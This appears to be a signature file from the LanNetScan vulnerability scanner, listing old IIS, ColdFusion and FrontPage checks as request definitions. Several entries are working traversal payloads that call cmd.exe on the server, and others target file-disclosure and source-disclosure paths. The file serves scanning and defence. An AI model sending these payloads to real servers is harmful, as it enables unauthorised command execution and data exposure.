/ Steganos Hacker Tools / SHT151.iso / programme / scanner / lannetscan / lannetscan.exe / data1.cab / Program_Files / Alerts / CGI_Abuses / iis.txt < prev    next >
Text File  |  2001-09-25  |  4.0 KB  |  161 lines

  1. RDS exploit (msadcs.dll) RFP9902
  2. 0,Run arbitrary commands (SYSTEM level privileges)
  3. HEAD
  4. msadcs.dll
  5. msadc
  6.  
  7. 529
  8. #-----------------------------------------------------------
  9. Escaped Characters Decoding Bug
  10. 0,Run arbitrary commands (IUSR_machinename level privileges)
  11. GET
  12. ..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
  13. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  14. DIRECTORY OF
  15. 2708
  16. #-----------------------------------------------------------
  17. Unicode Directory Traversal Bug
  18. 0,Run arbitrary commands (IUSR_machinename level privileges)
  19. GET
  20. ..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
  21. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  22. DIRECTORY OF
  23. 1806
  24. #-----------------------------------------------------------
  25. Unicode Directory Traversal Bug (2)
  26. 0,Run arbitrary commands (IUSR_machinename level privileges)
  27. GET
  28. ..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
  29. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  30. DIRECTORY OF
  31. 1806
  32. #-----------------------------------------------------------
  33. Executable File Parsing Bug
  34. 0,Run arbitrary commands (IUSR_machinename level privileges)
  35. GET
  36. lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir
  37. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  38. DIRECTORY OF
  39. 1912
  40. #-----------------------------------------------------------
  41. .ida/.idq trick
  42. 2,possibility to guess physical paths
  43. HEAD
  44. lanscan.ida
  45. /
  46.  
  47.  
  48. #-----------------------------------------------------------
  49. .ida/.idq trick (2)
  50. 2,possibility to guess physical paths
  51. HEAD
  52. lanscan.idq
  53. /
  54.  
  55.  
  56. #-----------------------------------------------------------
  57. Cold Fusion check (1)
  58. 1,view any file (e.g. getfile.cfm?filename=c:\boot.ini)
  59. HEAD
  60. exampleapp/email/getfile.cfm
  61. cfdocs
  62.  
  63.  
  64. #-----------------------------------------------------------
  65. Cold Fusion check (2)
  66. 1,start/stop the server
  67. HEAD
  68. Administrator/startstop.html
  69. cfide
  70.  
  71.  
  72. #-----------------------------------------------------------
  73. Cold Fusion check (3)
  74. 1,run CF code or denial of service
  75. HEAD
  76. snippets/evaluate.cfm
  77. cfdocs
  78.  
  79.  
  80. #-----------------------------------------------------------
  81. Cold Fusion check (4)
  82. 2,verify the existence of files
  83. HEAD
  84. snippets/fileexists.cfm
  85. cfdocs
  86.  
  87.  
  88. #-----------------------------------------------------------
  89. Cold Fusion check (5)
  90. 1,view .cfm files
  91. HEAD
  92. snippets/viewexample.cfm
  93. cfdocs
  94.  
  95.  
  96. #-----------------------------------------------------------
  97. Cold Fusion check (6)
  98. 1,view any file
  99. HEAD
  100. exampleapp/docs/sourcewindow.cfm
  101. cfdocs
  102.  
  103.  
  104. #-----------------------------------------------------------
  105. Frontpage check (1)
  106. 3,Frontpage extensions are installed on this computer
  107. HEAD
  108. _vti_inf.html
  109. /
  110.  
  111.  
  112. #-----------------------------------------------------------
  113. Frontpage check (2)
  114. 1,Some versions of Frontpage are vulnerable to denial of service attacks
  115. HEAD
  116. shtml.exe
  117. _vti_bin
  118.  
  119. 1608
  120. #-----------------------------------------------------------
  121. Frontpage check (3)
  122. 1,Some versions of Frontpage are vulnerable to denial of service attacks
  123. HEAD
  124. shtml.dll
  125. _vti_bin
  126.  
  127. 1608
  128. #-----------------------------------------------------------
  129. Terminal Services
  130. 3,Terminal Services are installed on this computer
  131. HEAD
  132. tsweb
  133. /
  134.  
  135.  
  136. #-----------------------------------------------------------
  137. MS Visual Studio RAD Support Buffer Overflow
  138. 0,Run arbitrary commands (IUSR_SYSTEM level privileges)
  139. HEAD
  140. fp30reg.dll
  141. /_vti_bin/_vti_aut
  142.  
  143. 2906
  144. #-----------------------------------------------------------
  145. ASP source using ::$DATA trick
  146. 2,Retrieve the source code of the remote ASP scripts
  147. GET
  148. default.asp::$DATA
  149. /
  150. CONTENT-TYPE: APPLICATION/OCTET-STREAM
  151. CVE-1999-0278
  152. #-----------------------------------------------------------
  153. ASP source using %2e trick
  154. 2,Retrieve the source code of remote ASP scripts
  155. GET
  156. default.asp%2e
  157. /
  158. CONTENT-TYPE: APPLICATION/OCTET-STREAM
  159. CAN-1999-0253
  160. #-----------------------------------------------------------
  161.